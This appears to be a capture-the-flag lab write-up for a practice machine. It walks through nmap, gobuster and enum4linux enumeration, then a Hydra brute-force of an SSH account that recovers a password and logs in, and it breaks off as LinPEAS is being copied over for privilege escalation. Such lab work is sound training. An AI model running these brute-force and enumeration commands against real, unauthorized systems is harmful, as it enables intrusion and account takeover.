This is a machine that allows you to practice web app hacking and privilege escalation
1. Reconnaissance
1.1 Nmap
Using nmap to scan for open ports and services
nmap -sV -oA nmap-inital 10.10.60.79
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-27 19:41 IST
Nmap scan report for 10.10.60.79
Host is up (0.19s latency).
Not shown: 994 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)
| 256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)
|_ 256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesnt have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open ajp13?
|_ajp-methods: Failed to get a valid response for the OPTION request
8080/tcp open http-proxy
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.7
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap done: 1 IP address (1 host up) scanned in 197.68 seconds
We find open tcp ports 22, 80, 139, 445, 8009, and 8080
2. Scanning
2.1 Gobuster
Using gobuster to brute-force directories.
gobuster dir -u http://10.10.60.79 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-small-directories.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.60.79
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-small-directories.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/03/27 19:46:55 Starting gobuster in directory enumeration mode
===============================================================
/development (Status: 301) [Size: 316] [--> http://10.10.60.79/development/]
We find a /development directory
2.2 Web Server
Visiting the IP address in the browser, we are greeted with a webpage
Going over to /development , we find 2 txt files
dev.txt
Here we find a conversation between two users referred to as k and j about the use of an outdated apache struts version.
j.txt
From this conversation, we can conclude that user j is using a weak password which can be easily cracked.
2.3 Enum4linux
We can use Enum4linux for further enumeration via SMB (port 445)
enum4linux -a 10.10.60.79
======================================
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
======================================
From the output, we can conclude that k and j referred earlier are users kay and jen respectively.
3. Gaining Access
3.1 Hydra
Using Hydra to brute-force jan's ssh password.
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.60.79:22
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-03-27 20:17:57
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.60.79:22/
[22][ssh] host: 10.10.60.79 login: jan password: armando
We get the credentials jan : armando
Login-in via ssh
ssh jan@10.10.60.79
jan@10.10.60.79 s password:
jan@basic2:~$
4. Privilege Escalation
We need to be user kay to view the pass.bak file located in their home directory.
4.1 LinPeas
Linpeas is a script that searches for possible privilege escalation vectors
Downloading the script in the attacker machine and copying it to the target via scp to the /tmp directory
